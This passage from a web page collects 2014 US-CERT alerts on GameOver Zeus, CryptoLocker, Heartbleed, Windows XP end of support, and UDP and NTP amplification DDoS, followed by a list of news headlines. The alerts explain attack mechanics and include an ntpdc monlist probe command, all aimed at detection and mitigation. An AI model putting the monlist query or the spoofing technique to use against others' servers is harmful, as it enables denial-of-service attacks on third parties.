files, and to send stolen data. [3] Without a single point of failure, the resiliency of GOZ’s P2P infrastructure makes takedown efforts more difficult. [1] A system infected with GOZ may be employed to send spam, participate in DDoS attacks, and harvest users' credentials for online services, including banking services. Users are recommended to take the following actions to remediate GOZ infections: http://www.f-secure.com/en/web/home_global/online-scanner (Windows Vista, 7 and 8) http://www.f-secure.com/en/web/labs_global/removal-tools/-/carousel/view/142 (Windows XP) http://goz.heimdalsecurity.com/ (Microsoft Windows XP, Vista, 7, 8 and 8.1) McAfee www.mcafee.com/stinger (Windows XP SP2, 2003 SP2, Vista SP1, 2008, 7 and 8) http://www.microsoft.com/security/scanner/en-us/default.aspx (Windows 8.1, Windows 8, Windows 7, Windows Vista, and Windows XP) http://www.sophos.com/VirusRemoval (Windows XP (SP2) and above) http://www.symantec.com/connect/blogs/international-takedown-wounds-gameover-zeus-cybercrime-network (Windows XP, Windows Vista and Windows 7) http://www.trendmicro.com/threatdetector (Windows XP, Windows Vista, Windows 7, Windows 8/8.1, Windows Server 2003, Windows Server 2008, and Windows Server 2008 R2) www.decryptcryptolocker.com FireEye and Fox-IT have created a web portal claiming to restore/decrypt files of CryptoLocker victims. US-CERT has performed no evaluation of this claim, but is providing a link to enable individuals to make their own determination of suitability for their needs. At present, US-CERT is not aware of any other product that claims similar functionality. This product is provided subject to this Notification and this Privacy & Use policy. |
||||||||||||||||||||||||||||||||||||
|
TA14-098A: OpenSSL 'Heartbleed' vulnerability (CVE-2014-0160)
A vulnerability in OpenSSL could allow a remote attacker to expose sensitive data, possibly including user authentication credentials and secret keys, through incorrect memory handling in the TLS heartbeat extension. OpenSSL versions 1.0.1 through 1.0.1f contain a flaw in its implementation of the TLS/DTLS heartbeat functionality. This flaw allows an attacker to retrieve private memory of an application that uses the vulnerable OpenSSL library in chunks of 64k at a time. Note that an attacker can repeatedly leverage the vulnerability to retrieve as many 64k chunks of memory as are necessary to retrieve the intended secrets. The sensitive information that may be retrieved using this vulnerability include: Exploit code is publicly available for this vulnerability. Additional details may be found in CERT/CC Vulnerability Note VU#720951. This flaw allows a remote attacker to retrieve private memory of an application that uses the vulnerable OpenSSL library in chunks of 64k at a time. OpenSSL 1.0.1g has been released to address this vulnerability. Any keys generated with a vulnerable version of OpenSSL should be considered compromised and regenerated and deployed after the patch has been applied. US-CERT recommends system administrators consider implementing Perfect Forward Secrecy to mitigate the damage that may be caused by future private key disclosures. This product is provided subject to this Notification and this Privacy & Use policy. |
TA14-069A: Microsoft Ending Support for Windows XP and Office 2003
Microsoft is ending support for the Windows XP operating system and Office 2003 product line on April 8, 2014. [1] After this date, these products will no longer receive: All software products have a lifecycle. End of support refers to the date when Microsoft no longer provides automatic fixes, updates, or online technical assistance. [2] As of February 2014, nearly 30 percent of Internet-connected PCs still run Windows XP. [3] Microsoft will send “End of Support” notifications to users of Windows XP who have elected to receive updates via Windows Update. Users in organizations using Windows Server Update Services (WSUS), System Center Configuration manager, or Windows Intune will not receive the notification. [4] Computer systems running unsupported software are exposed to an elevated risk to cybersecurity dangers, such as malicious attacks or electronic data loss. Users may also encounter problems with software and hardware compatibility since new software applications and hardware devices may not be built for Windows XP or Office 2003. Organizations that are governed by regulatory obligations may find they are no longer able to satisfy compliance requirements. [4] Computers operating Windows XP with SP3 or running Office 2003 products will continue to work after support ends. However, using unsupported software may increase the risk of viruses and other security threats. Users have the option to upgrade to a currently supported operating system or office productivity suite. The Microsoft “End of Support” pages for Windows XP and Office 2003 offer additional details. There are software vendors and service providers in the marketplace who offer assistance in migrating from Windows XP or Office 2003 to a currently supported operating system or office productivity suite. US-CERT does not endorse or support any particular product or vendor. Users who choose to continue using Windows XP after the end of support may mitigate some risks by using a web browser other than Internet Explorer. The Windows XP versions of some alternative browsers will continue to receive support temporarily. Users should consult the support pages of their chosen alternative browser for more details. This product is provided subject to this Notification and this Privacy & Use policy. |
||||||||||||||||||||||||||||||||||||
|
TA14-017A: UDP-based Amplification Attacks
Certain UDP protocols have been identified as potential attack vectors: A Distributed Reflective Denial of Service (DRDoS) attack is an emerging form of Distributed Denial of Service (DDoS) that relies on the use of publicly accessible UDP servers, as well as bandwidth amplification factors, to overwhelm a victim system with UDP traffic. UDP, by design, is a connection-less protocol that does not validate source IP addresses. Unless the application-layer protocol uses countermeasures such as session initiation, it is very easy to forge the IP packet datagram to include an arbitrary source IP address [7]. When many UDP packets have their source IP address forged to a single address, the server responds to that victim, creating a reflected Denial of Service (DoS) Attack. Recently, certain UDP protocols have been found to have particular responses to certain commands that are much larger than the initial request. Where before, attackers were limited linearly by the number of packets directly sent to the target to conduct a DoS attack, now a single packet can generate tens or hundreds of times the bandwidth in its response. This is called an amplification attack, and when combined with a reflective DoS attack on a large scale it makes it relatively easy to conduct DDoS attacks. To measure the potential effect of an amplification attack, we use a metric called the bandwidth amplification factor (BAF). BAF can be calculated as the number of UDP payload bytes that an amplifier sends to answer a request, compared to the number of UDP payload bytes of the request [9] [10]. The list of known protocols, and their associated bandwidth amplification factors, is listed below. US-CERT would like to offer thanks to Christian Rossow for providing this information to us. For more information on bandwith amplificatication factors, please see Christian's blog and associated research paper. Attackers can utilize the bandwidth and relative trust of large servers that provide the above UDP protocols to flood victims with unwanted traffic, a DDoS attack. Detection of DRDoS attacks is not easy, due to their use of large, trusted servers that provide UDP services. As a victim, traditional DoS mitigation techniques may apply. As a network operator of one of these exploitable services, look for abnormally large responses to a particular IP address. This may indicate that an attacker is using your service to conduct a DRDoS attack. Source IP Verification Because the UDP requests being sent by the attacker-controlled clients must have a source IP address spoofed to appear as the victim’s IP, the first step to reducing the effectiveness of UDP amplification is for Internet Service Providers to reject any UDP traffic with spoofed addresses. The Network Working Group of the Internet Engineering Task Force (IETF) released Best Current Practice 38 document in May 2000 and Best Current Practice 84 in March 2004 that describes how an Internet Service Provider can filter network traffic on their network to reject packets with source addresses not reachable via the actual packet’s path [3][4]. The changes recommended in these documents would cause a routing device to evaluate whether it is possible to reach the source IP address of the packet via the interface that transmitted the packet. If it is not possible, then the packet most likely has a spoofed source IP address. This configuration change would substantially reduce the potential for most popular types of DDoS attacks. As such, we highly recommend to all network operators to perform network ingress filtering if possible. Note that it will not explicitly protect a UDP service provider from being exploited in a DRDoS (all network providers must use ingress filtering in order to completely eliminate the threat). To verify your network has implemented ingress filtering, download the open source tools from the Spoofer Project [5]. Traffic Shaping Limiting responses to UDP requests is another potential mitigation to this issue. This may require testing to discover the optimal limit that does not interfere with legitimate traffic. The IETF released Request for Comment 2475 and Request for Comment 3260 that describes some methods to shape and control traffic [6] [8]. Most network devices today provide these functions in their software. This product is provided subject to this Notification and this Privacy & Use policy. |
TA14-013A: NTP Amplification Attacks Using CVE-2013-5211
NTP servers A Network Time Protocol (NTP) Amplification attack is an emerging form of Distributed Denial of Service (DDoS) that relies on the use of publically accessible NTP servers to overwhelm a victim system with UDP traffic. The NTP service supports a monitoring service that allows administrators to query the server for traffic counts of connected clients. This information is provided via the “monlist” command. The basic attack technique consists of an attacker sending a "get monlist" request to a vulnerable NTP server, with the source address spoofed to be the victim’s address. The attack relies on the exploitation of the 'monlist' feature of NTP, as described in CVE-2013-5211, which is enabled by default on older NTP-capable devices. This command causes a list of the last 600 IP addresses which connected to the NTP server to be sent to the victim. Due to the spoofed source address, when the NTP server sends the response it is sent instead to the victim. Because the size of the response is typically considerably larger than the request, the attacker is able to amplify the volume of traffic directed at the victim. Additionally, because the responses are legitimate data coming from valid servers, it is especially difficult to block these types of attacks. The solution is to disable “monlist” within the NTP server or to upgrade to the latest version of NTP (4.2.7) which disables the “monlist” functionality. On a UNIX-platform, the command “ntpdc” will query existing NTP servers for monitoring data. If the system is vulnerable to exploitation, it will respond to the “monlist” command in interactive mode. By default, most modern UNIX and Linux distributions allow this command to be used from localhost, but not from a remote host. To test for monlist support, execute the following command at the command line: /usr/sbin/ntpdc <remote server> monlist Additionally, the “ntp-monlist” script is available for NMap, which will automatically display the results of the monlist command. If the system does not support the monitor query, and is therefore not vulnerable to this attack type, NMap will return an error type 4 (No Data Available) or no reply at all. Recommended Course of Action As all versions of ntpd prior to 4.2.7 are vulnerable by default, the simplest recommended course of action is to upgrade all versions of ntpd that are publically accessible to at least 4.2.7. However, in cases where it is not possible to upgrade the version of the service, it is possible to disable the monitor functionality in earlier versions of the software. To disable “monlist” functionality on a public-facing NTP server that cannot be updated to 4.2.7, add the “noquery” directive to the “restrict default” line in the system’s ntp.conf, as shown below: restrict default kod nomodify notrap nopeer noquery restrict -6 default kod nomodify notrap nopeer noquery This product is provided subject to this Notification and this Privacy & Use policy. |
|
ICE and Qatari Security Forces at the Winter Olympics Put Italians on Edge
|
Jeffrey Epstein Had a ‘Personal Hacker,’ Informant Claims
|
|
How to Film ICE
|
ICE Pretends It’s a Military Force. Its Tactics Would Get Real Soldiers Killed
|
|
An AI Toy Exposed 50,000 Logs of Its Chats With Kids to Anyone With a Gmail Account
|
ICE Is Using Palantir’s AI Tools to Sort Through Tips
|
|
Here’s the Company That Sold DHS ICE’s Notorious Face Recognition App
|
6 Best VPN Services (2026), Tested and Reviewed
|
|
He Leaked the Secrets of a Southeast Asian Scam Compound. Then He Had to Get Out Alive
|
Revealed: Leaked Chats Expose the Daily Life of a Scam Compound’s Enslaved Workforce
|
|
Judge Delays Minnesota ICE Decision While Weighing Whether State Is Being Illegally Punished
|
Deepfake ‘Nudify’ Technology Is Getting Darker—and More Dangerous
|
|
The Instant Smear Campaign Against Border Patrol Shooting Victim Alex Pretti
|
ICE Asks Companies About ‘Ad Tech and Big Data’ Tools It Could Use in Investigations
|
|
DOGE May Have Misused Social Security Data, DOJ Admits
|
US Judge Rules ICE Raids Require Judicial Warrants, Contradicting Secret ICE Memo
|
|
CBP Wants AI-Powered ‘Quantum Sensors’ for Finding Fentanyl in Cars
|
149 Million Usernames and Passwords Exposed by Unsecured Database
|
|
ICE Agents Are ‘Doxing’ Themselves
|
Surveillance and ICE Are Driving Patients Away From Medical Care, Report Warns
|
